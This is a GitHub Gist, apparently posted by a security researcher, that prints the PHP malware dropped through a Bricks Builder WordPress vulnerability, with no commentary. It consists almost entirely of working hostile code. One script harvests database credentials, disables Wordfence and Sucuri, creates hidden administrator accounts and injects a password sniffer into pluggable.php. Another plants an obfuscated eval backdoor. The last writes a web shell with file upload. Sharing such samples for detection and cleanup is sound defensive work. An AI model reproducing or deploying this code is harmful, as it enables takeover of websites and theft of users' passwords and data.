Last active
March 7, 2024 16:01
-
-
Save lynt-smitka/1eef476aed934fd3bc0be0813ea82f39 to your computer and use it in GitHub Desktop.
Bircks Builder <1.9.6.1 Malware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
@ini_set('display_errors', 0); | |
@ini_set('log_errors', 0); | |
@error_reporting(0); | |
function genstr($length = 10) | |
{ | |
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length); | |
} | |
function gwi($dr, &$aa) | |
{ | |
if (!file_exists("$dr/wp-includes/version.php")) return NULL; | |
if (!@include("$dr/wp-includes/version.php")) return NULL; | |
$cd = array(); | |
$cd['host'] = "none"; | |
$cd['auth_key'] = "_" . genstr(56); | |
$cd['name'] = "wordpress"; | |
$cd['docroot'] = $dr; | |
$cd['ver'] = ""; | |
$cd['db_login'] = ""; | |
$cd['db_passwd'] = ""; | |
$cd['db_name'] = ""; | |
$cd['db_host'] = ""; | |
$cd['db_prefix'] = ""; | |
$cd["wf_status"] = "none"; | |
$cd["wf2_status"] = "none"; | |
$cd["se_status"] = "none"; | |
$cd["users"] = Array(); | |
$bp = $dr . "/wp-content/plugins/"; | |
$ntd = array("se_status" => "sucuri-scanner/sucuri.php", | |
"wf_status" => "wordfence/wordfence.php", "wf2_status" => "wordfence/waf/bootstrap.php"); | |
foreach ($ntd as $name=>$pg) { | |
if (is_file($bp . $pg)) { | |
@rename($bp . $pg, $bp . $pg . "backup" . rand()); | |
if (is_file($bp . $pg)) { | |
$cd[$name] = "cantdisable"; | |
} else { | |
$cd[$name] = "disabled"; | |
} | |
} | |
} | |
if (!isset($wp_version)) { | |
$wp_version = "unknown"; | |
} | |
$cnt = @file_get_contents("$dr/wp-config.php"); | |
preg_match_all(/(define\(\s*\')([^\']+)(\',\s*\')([^\']+)/, $cnt, $m); | |
if (is_array($m)) { | |
for ($i = 0; $i < count($m[2]); $i++) { | |
if (stristr($m[2][$i], "db_name")) { | |
$cd['db_name'] = $m[4][$i]; | |
} elseif (stristr($m[2][$i], "db_user")) { | |
$cd['db_login'] = $m[4][$i]; | |
} elseif (stristr($m[2][$i], "db_password")) { | |
$cd['db_passwd'] = $m[4][$i]; | |
} elseif (stristr($m[2][$i], "db_host")) { | |
$cd['db_host'] = $m[4][$i]; | |
} | |
} | |
} | |
preg_match_all(/table_prefix\s*=\s*['"](.*)['"];/, $cnt, $m); | |
if (is_array($m)) { | |
$cd['db_prefix'] = $m[1][0]; | |
} | |
$cd['ver'] = $wp_version; | |
$cd = awu($cd, $aa); | |
return sws($dr, $cd); | |
} | |
function sws($docroot, $cd) | |
{ | |
$rep = "\$ignore_codes = array"; | |
$pd = <<< BASE64decoded | |
if (!is_wp_error($user)) | |
{ | |
$csrf = "{AUTHKEY}"; | |
$line = $password . "\t" . $username . "\t" . get_site_url(); | |
$line = $line ^ str_repeat($csrf, (strlen($line) / strlen($csrf)) + 1); | |
$line = bin2hex($line); | |
$lines = @file("{DUMPFILE}", FILE_IGNORE_NEW_LINES); | |
$lines[] = $line; | |
@file_put_contents("{DUMPFILE}", implode("\n", array_unique($lines))); | |
$lines = get_option('wpsdt4_license_key'); | |
$lines = explode("\n", $lines); | |
$lines[] = $line; | |
$lines = array_unique($lines); | |
update_option('wpsdt4_license_key', implode("\n", array_unique($lines))); | |
} | |
BASE64decoded; | |
$pa = <<< BASE64decoded | |
if (isset($_COOKIE["{AUTHKEY}"])) | |
{ | |
$lines = get_option( 'wpsdt4_license_key' ); | |
if (!empty($lines)) | |
{ | |
$lines = @file_get_contents("{DUMPFILE}"); | |
} | |
echo $lines; | |
exit(); | |
} | |
BASE64decoded; | |
$pf = "$docroot/wp-includes/pluggable.php"; | |
$pc = @file_get_contents($pf); | |
if (strpos($pc, "line ^ str_repeat") !== FALSE) { | |
preg_match_all(/\$csrf\s=\s\"(\w{20,})\";/, $pc, $m); | |
if (is_array($m)) | |
{ | |
$cd["auth_key"] = $m[1][0]; | |
} | |
$cd["sniffer_status"] = "already"; | |
return $cd; | |
} | |
$au = $cd["auth_key"]; | |
$df = substr(md5($au), 0, 8); | |
$pd = str_replace("{AUTHKEY}", $au, $pd); | |
$pd = str_replace("{DUMPFILE}", $df, $pd); | |
$pa = str_replace("{AUTHKEY}", $au, $pa); | |
$pa = str_replace("{DUMPFILE}", $df, $pa); | |
$ot = @stat($pf); | |
$src = @file_get_contents($pf); | |
$src = str_replace($rep, $pd . "\r\n" . $rep, $src); | |
$src = $src . "\r\n" . $pa; | |
@file_put_contents($pf, $src); | |
@touch($pf, $ot["mtime"]); | |
if (strpos(@file_get_contents($pf), $au) !== FALSE) { | |
$cd["sniffer_status"] = "installed"; | |
} else { | |
$cd["sniffer_status"] = "error"; | |
} | |
return $cd; | |
} | |
function awu($cd, &$aa) | |
{ | |
$dbn = $cd['db_name']; | |
$dbu = $cd['db_login']; | |
$dbp = $cd['db_passwd']; | |
$dh = $cd['db_host']; | |
$dpfx = $cd['db_prefix']; | |
if (!empty($dbn)) { | |
if (strpos($dh, ":") !== FALSE) { | |
$hp = explode(":", $dh); | |
$h1 = $hp[0]; | |
$port = intval($hp[1]); | |
} else { | |
$h1 = $dh; | |
$port = 3306; | |
} | |
if ($conn = mysqli_connect($h1, $dbu, $dbp, $dbn, $port)) { | |
$result = mysqli_query($conn, "SHOW DATABASES;"); | |
$dbs = Array(); | |
while($rw = mysqli_fetch_array($result, MYSQLI_NUM)) | |
{ | |
$dbs[] = $rw; | |
} | |
foreach ($dbs as $cdb) { | |
$cdb = $cdb[0]; | |
if (TRUE) { | |
mysqli_select_db($conn, $cdb); | |
$result2 = mysqli_query($conn, "SHOW TABLES;"); | |
$tab = Array(); | |
while($rw = mysqli_fetch_array($result2, MYSQLI_NUM)) | |
{ | |
$tab[] = $rw; | |
} | |
foreach ($tab as $wct) { | |
$wct = $wct[0]; | |
$ppos = strpos($wct, "usermeta"); | |
if ($ppos !== FALSE) { | |
$pfx = substr($wct, 0, $ppos); | |
$result3 = mysqli_query($conn, "SELECT option_value FROM " . $pfx . "options WHERE option_name='siteurl';"); | |
$su = mysqli_fetch_array($result3, MYSQLI_NUM); | |
if (count($su)) { | |
$su = $su[0]; | |
$do = explode("/", $su); | |
$do = $do[2]; | |
$do = str_replace("www.", "", $do); | |
if ($dpfx === $pfx) | |
{ | |
$cd['host'] = $do; | |
} | |
$ra = mysqli_query($conn, "SELECT * FROM " . $pfx . "users WHERE user_login LIKE 'wpcron%';"); | |
if (mysqli_num_rows($ra)) | |
{ | |
break; | |
} | |
$ck = $h1 . $dbu . $dbp . $dbn . $do; | |
if (isset($aa[$ck])) | |
{ | |
continue; | |
} | |
$aa[$ck] = TRUE; | |
$usern = 'wpcron' . substr(md5(time()), 0, 8); | |
$pp = genstr(8); | |
$pass = md5($pp); | |
mysqli_query($conn, "INSERT INTO $pfx" . "users (`user_login`, `user_pass`, `user_nicename`, `user_status`, `display_name`, `user_registered`) VALUES ('$usern', '$pass', '$usern', 0, '$usern', '1979-01-01 00:00:00');"); | |
mysqli_query($conn, "SET @created_user_id = LAST_INSERT_ID();"); | |
mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');"); | |
mysqli_query($conn, "INSERT INTO $pfx" . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @created_user_id, '" . $pfx . "user_level', '10');"); | |
mysqli_commit($conn); | |
$cd["users"][] = Array($su, $usern, $pp); | |
} | |
} | |
} | |
} | |
} | |
mysqli_close($conn); | |
} | |
} | |
return $cd; | |
} | |
function list_dir($dir, $od=TRUE) | |
{ | |
$res = Array(); | |
$dir = strlen($dir) == 1 ? $dir : rtrim($dir, '\\/'); | |
$h = @opendir($dir); | |
if ($h === FALSE) { | |
return $res; | |
} | |
while (($f = readdir($h)) !== FALSE) { | |
if ($f !== '.' and $f !== '..') { | |
$tmp = "$dir/$f"; | |
if ($od) { | |
if (@is_dir($tmp)) { | |
$res[] = $tmp; | |
} | |
} | |
else{ | |
$res[] = $tmp; | |
} | |
} | |
} | |
closedir($h); | |
return $res; | |
} | |
$bd = Array(); | |
$aq = Array(); | |
$cd = $_SERVER["DOCUMENT_ROOT"]; | |
while ($cd = @dirname($cd)) { | |
if ($cd == $aq[count($aq) - 1]) { | |
break; | |
} | |
$aq[] = $cd; | |
} | |
foreach ($aq as $cd) { | |
if (!in_array($cd, $bd)) { | |
$l1 = list_dir($cd); | |
foreach ($l1 as $l1d) | |
{ | |
$bd = array_merge($bd, list_dir($l1d)); | |
} | |
$bd = array_merge($bd, $l1); | |
} | |
} | |
$bd = array_unique(array_merge($aq, $bd)); | |
$aa = Array(); | |
$res = Array(); | |
foreach ($bd as $dc) | |
{ | |
$tmp = gwi($dc, $aa); | |
if ($tmp) | |
{ | |
$res[] = $tmp; | |
} | |
} | |
echo "{MARK}" . rawurlencode(serialize($res)) . "{MARK}"; | |
exit(); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if(!defined(\"PHP_EOL\")) | |
{ | |
define(\"PHP_EOL\", \"\n\"); | |
} | |
if(!defined(\"DIRECTORY_SEPARATOR\")) | |
{ | |
define(\"DIRECTORY_SEPARATOR\", \"/\"); | |
} | |
function generateRandomStringEval($length = 12) | |
{ | |
$characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz'; | |
$charactersLength = strlen($characters); | |
$randomString = ''; | |
for ($i = 0; $i < $length; $i++) { | |
$randomString .= $characters[rand(0, $charactersLength - 1)]; | |
} | |
return $randomString ; | |
} | |
function generateRndString($length = 10) | |
{ | |
$characters = '0123456789abcdefghijklmnopqrstuvwxyz'; | |
$charactersLength = strlen($characters); | |
$randomString = ''; | |
for ($i = 0; $i < $length; $i++) { | |
$randomString .= $characters[rand(0, $charactersLength - 1)]; | |
} | |
return $randomString ; | |
} | |
function generateRandomString($length = 10) | |
{ | |
$characters = '0123456789abcdefghijklmnopqrstuvwxyz'; | |
$charactersLength = strlen($characters); | |
$randomString = ''; | |
for ($i = 0; $i < $length; $i++) { | |
$randomString .= $characters[rand(0, $charactersLength - 1)]; | |
} | |
return $randomString . \".php\"; | |
} | |
function _add_action($snippet, $template, $xor_number) | |
{ | |
$splitted = str_split($snippet); | |
$action = \"\"; | |
for ($i = 0; $i < strlen($snippet);$i++) { | |
$action .= $splitted[$i] ^ $template[$i%$xor_number]; | |
} | |
$action = urlencode($action); | |
return $action; | |
} | |
function GetDocRoot() | |
{ | |
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']); | |
if ($docroot_end === FALSE) | |
{ | |
return $_SERVER['DOCUMENT_ROOT']; | |
} | |
elseif ($docroot_end === 0) | |
{ | |
return \"/\"; | |
} | |
else | |
{ | |
return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end); | |
} | |
} | |
$origin_backdoor = <<< BASE64decoded | |
<?php | |
@ini_set('error_log', NULL); | |
@ini_set('log_errors', 0); | |
@ini_set('max_execution_time', 0); | |
@set_time_limit(0); | |
function shdp($data, $key) | |
{ | |
$out_data = ""; | |
for ($i = 0; $i < strlen($data);) { | |
for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) { | |
$out_data .= chr(ord($data[$i]) ^ ord($key[$j])); | |
} | |
} | |
return $out_data; | |
} | |
if (isset($_GET[673435])) | |
{ | |
die(md5(47712)); | |
} | |
$temp=array_merge($_COOKIE, $_POST); | |
foreach ($temp as $data_key => $data) { | |
$data = @unserialize(shdp(shdp(base64_decode($data), '4ef63abe-1abd-45a6-913d-6fb99657e24b'), $data_key)); | |
if (isset($data['ak'])) { | |
if ($data['a'] == 'i') { | |
$i = array( | |
'pv' => @phpversion(), | |
'sv' => '1.0-1', | |
); | |
echo @serialize($i); | |
} elseif ($data['a'] == 'e') { | |
eval($data['d']); | |
} | |
exit(); | |
} | |
} | |
BASE64decoded; | |
$new_pass = generateRndString(35); | |
$origin_backdoor = str_replace(\"4ef63abe-1abd-45a6-913d-6fb99657e24b\",$new_pass,$origin_backdoor ); | |
$evaluaor = <<< BASE64decoded | |
<?php | |
function _remove_action($snippet, $template) | |
{ | |
$snippet = urldecode($snippet); | |
$splitted = str_split($snippet); | |
$action = ""; | |
for ($i = 0; $i < strlen($snippet);$i++) { | |
$action .= $splitted[$i] ^ $template[$i%xor_number]; | |
} | |
return $action; | |
} | |
$i="#URLENCODED_CODE#"; | |
$j="#URLENCODED_file_put_contetnts#"; | |
$index="#XORKEY#"; | |
$k = _remove_action($i, $index); | |
$f = _remove_action($j, $index); | |
$f($index, $k); | |
include_once ($index); | |
unlink($index); | |
exit(); | |
BASE64decoded; | |
$xor_number=rand(3,12); | |
$XORKEY = generateRandomStringEval(12); | |
$URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number); | |
$URLENCODED_CODE_file_put_contents = _add_action(\"file_put_contents\", $XORKEY, $xor_number); | |
$snippet_varname = generateRandomStringEval(rand(6,12)); | |
$template_varname = generateRandomStringEval(rand(6,12)); | |
$splitted_varname = generateRandomStringEval(rand(6,12)); | |
$_remove_action_varname = generateRandomStringEval(rand(6,12)); | |
$index_varname = generateRandomStringEval(rand(6,12)); | |
$evaluaor=str_replace('$splitted', \"$\".$splitted_varname, $evaluaor); | |
$evaluaor=str_replace('xor_number', $xor_number, $evaluaor); | |
$evaluaor=str_replace('$index', \"$\".$index_varname, $evaluaor); | |
$evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor); | |
$evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor); | |
$evaluaor=str_replace('$template', \"$\".$template_varname, $evaluaor); | |
$evaluaor=str_replace('$snippet', \"$\".$snippet_varname, $evaluaor); | |
$evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor); | |
$payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor); | |
srand(time()); | |
if (!function_exists('file_put_contents')) { | |
function file_put_contents($filename, $data) { | |
$f = @fopen($filename, 'w'); | |
if (!$f) { | |
return false; | |
} else { | |
$bytes = fwrite($f, $data); | |
fclose($f); | |
return $bytes; | |
} | |
} | |
} | |
//////////////////////////////////////////////////////////////////////////////////////////// | |
$filename = \"readurl.php\"; | |
# $filename = generateRandomString(); | |
#$filename = \"options-reading.php\"; | |
#$filename = \"wp-login.php\"; | |
$filename = \"xjc6q59v.php\"; | |
# get base local and remote path | |
$base_www_path = $host = @$_SERVER['HTTP_HOST']; | |
$base_local_path = GetDocRoot(); | |
$full_payload_name = GetDocRoot() . \"/$filename\"; | |
$good = FALSE; | |
if (file_put_contents($full_payload_name, $payload_file)) | |
{ | |
echo \"UROK#http://\" . $filename. \"#ONDOK#\". $new_pass . \"#ENDP\" . PHP_EOL; | |
$good=TRUE; | |
$good_counter++; | |
exit(); | |
} | |
if(!$good) | |
echo \"URL#STATUS_CANTUPLOAD#CCCURL\"; | |
echo \"#CCCURL\"; | |
//unlink(\"dfaonfpfkwg.php\"); | |
exit();?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php file_put_contents(\"e9a045b4ce28.php\",\" | |
<?php echo 409723 * 20; | |
if (md5($_COOKIE["d"]) == "17028f487cb2a84607646da3ad3878ec") { | |
echo "ok"; | |
eval(base64_decode($_REQUEST["id"])); | |
if ($_POST["up"] == "up") { | |
@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]); | |
} | |
} ?> | |
\") | |
;exit;?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment